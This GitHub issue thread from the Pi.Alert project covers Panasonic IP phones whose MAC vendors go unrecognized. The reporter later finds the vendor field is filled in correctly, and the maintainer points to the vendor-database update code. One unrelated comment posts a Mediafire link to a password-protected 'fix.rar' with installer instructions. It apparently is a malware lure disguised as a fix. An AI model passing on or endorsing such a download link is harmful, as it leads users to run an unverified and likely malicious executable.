### ISSUE TITLE
[Bug] Devices not recognized

### ISSUE THREAD

**Issue by stanelie** [leiweibau/Pi.Alert#375]
I have about 50 IP phones made by Panasonic, their MAC addresses start with BC:C3:42 and 4C:36:4E, and they are not recognized by pi.alert. They show up as (unknown).

They are properly recognized by my other network monitoring solution (Fing, it even tells me that the device is an IP phone, and it tells me the model number) and I can find them in this public database of hardware mac addresses, for example : 
https://hwaddress.com/oui-iab/BC-C3-42/
https://hwaddress.com/oui-iab/4C-36-4E/

I have other devices that are also affected.

If this is not a bug, would it be possible to add other MAC addresses sources of identifying data?

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by stanelie** [comment]
My bad,
It looks like those Panasonic devices are recognized correctly after all. The Vendor field is populated correctly.

**Comment by leiweibau** [comment]
Only for the protocol  
This Script updates the databases (once a Week)

https://github.com/leiweibau/Pi.Alert/blob/main/back/update_vendors.sh

This function calls the script 

https://github.com/leiweibau/Pi.Alert/blob/8dd991ea70b83eee1c4b55f161084ed5d990ec82/back/pialert.py#L620

An attempt is made to recognize unknown vendors after each database update

https://github.com/leiweibau/Pi.Alert/blob/8dd991ea70b83eee1c4b55f161084ed5d990ec82/back/pialert.py#L640

The MAC addresses found are searched for in the database during each scan 

https://github.com/leiweibau/Pi.Alert/blob/8dd991ea70b83eee1c4b55f161084ed5d990ec82/back/pialert.py#L1828

If there is an error here, I would be happy to receive a pull request.
